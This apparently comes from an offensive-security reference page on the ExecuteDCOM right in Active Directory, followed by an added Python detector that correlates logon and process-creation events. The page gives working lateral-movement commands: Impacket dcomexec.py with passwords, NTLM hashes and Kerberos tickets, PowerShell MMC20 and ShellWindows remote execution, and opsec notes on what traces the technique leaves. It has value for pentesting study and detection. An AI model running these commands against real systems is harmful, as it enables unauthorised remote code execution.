ExecuteDCOM
Principal has the right to execute DCOM objects on the target computer, enabling remote code execution.
Applies to: User/Group → Computer
Linux Abuse
dcomexec.py (password)
dcomexec.py <domain>/<username>:'<password>'@<target>
dcomexec.py (pass-the-hash)
dcomexec.py -hashes :<ntlm-hash> <domain>/<username>@<target>
dcomexec.py (specific DCOM object)
# Objects: MMC20, ShellWindows, ShellBrowserWindow (default: MMC20)
dcomexec.py -object MMC20 <domain>/<username>:'<password>'@<target> 'whoami'
dcomexec.py -object ShellWindows <domain>/<username>:'<password>'@<target> 'whoami'
dcomexec.py (Kerberos)
KRB5CCNAME=<ccache> dcomexec.py -k -no-pass <domain>/<username>@<target>
Windows Abuse
MMC20.Application
$com = [Activator]::CreateInstance([Type]::GetTypeFromProgID("MMC20.Application","<target>"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c whoami > C:\output.txt","7")
ShellWindows
$com = [Activator]::CreateInstance([Type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39","<target>"))
$item = $com.Item()
$item.Document.Application.ShellExecute("cmd.exe","/c whoami > C:\output.txt","C:\Windows\System32",$null,0)
ShellBrowserWindow
$com = [Activator]::CreateInstance([Type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","<target>"))
$com.Document.Application.ShellExecute("cmd.exe","/c whoami > C:\output.txt","C:\Windows\System32",$null,0)
Opsec
- DCOM uses port 135 (RPC endpoint mapper) + dynamic high ports
- Spawns child processes under mmc.exe, explorer.exe, or svchost.exe depending on object used
- ShellWindows/ShellBrowserWindow require an existing Explorer session on target (typically works on workstations, not servers)
- Generates Event ID 4624 (logon type 3); no dedicated DCOM event log
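
Since there is no dedicated DCOM event log, detection has to correlate the artifacts listed above. The following is an added example, not part of the original page: it flags process-creation events (Security 4688) where one of the listed parent images spawns a shell within a short window after a type-3 logon (4624). The sample events, the shell watchlist and the 30-second window are constructed assumptions.

```python
from datetime import datetime, timedelta
from ntpath import basename  # parses Windows paths on any platform

# Parent images named in the Opsec notes; the shell watchlist is an assumption.
DCOM_PARENTS = {"mmc.exe", "explorer.exe", "svchost.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe"}
WINDOW = timedelta(seconds=30)  # assumed correlation window, tune per environment

# Constructed sample events; field names follow Security events 4624 and 4688.
EVENTS = [
    {"EventID": 4624, "Time": "2024-05-01T10:00:00", "LogonType": 3,
     "TargetUserName": "alice", "IpAddress": "10.0.0.50", "TargetLogonId": "0x5a1f2"},
    {"EventID": 4688, "Time": "2024-05-01T10:00:02", "SubjectLogonId": "0x5a1f2",
     "ParentProcessName": r"C:\Windows\System32\mmc.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe"},
    # Interactive user opening a shell from Explorer: no type-3 logon nearby.
    {"EventID": 4624, "Time": "2024-05-01T11:00:00", "LogonType": 2,
     "TargetUserName": "bob", "IpAddress": "-", "TargetLogonId": "0x7c001"},
    {"EventID": 4688, "Time": "2024-05-01T11:00:05", "SubjectLogonId": "0x7c001",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe"},
]

def find_dcom_exec(events, window=WINDOW):
    """Return alerts for shells spawned by a DCOM host parent soon after a type-3 logon."""
    logons = [(datetime.fromisoformat(e["Time"]), e) for e in events
              if e["EventID"] == 4624 and e["LogonType"] == 3]
    alerts = []
    for e in events:
        if e["EventID"] != 4688:
            continue
        parent = basename(e["ParentProcessName"]).lower()
        child = basename(e["NewProcessName"]).lower()
        if parent not in DCOM_PARENTS or child not in SHELL_CHILDREN:
            continue
        t = datetime.fromisoformat(e["Time"])
        near = [l for lt, l in logons if timedelta(0) <= t - lt <= window]
        if near:
            alerts.append({
                "time": e["Time"], "parent": parent, "child": child,
                "sources": sorted({l["IpAddress"] for l in near}),
                # True when the process runs in the network logon session itself.
                "same_session": any(l["TargetLogonId"] == e["SubjectLogonId"] for l in near),
            })
    return alerts

if __name__ == "__main__":
    for alert in find_dcom_exec(EVENTS):
        print(alert)
```

Process creation auditing (4688 with parent process name) must be enabled on the target for this correlation to have data to work with.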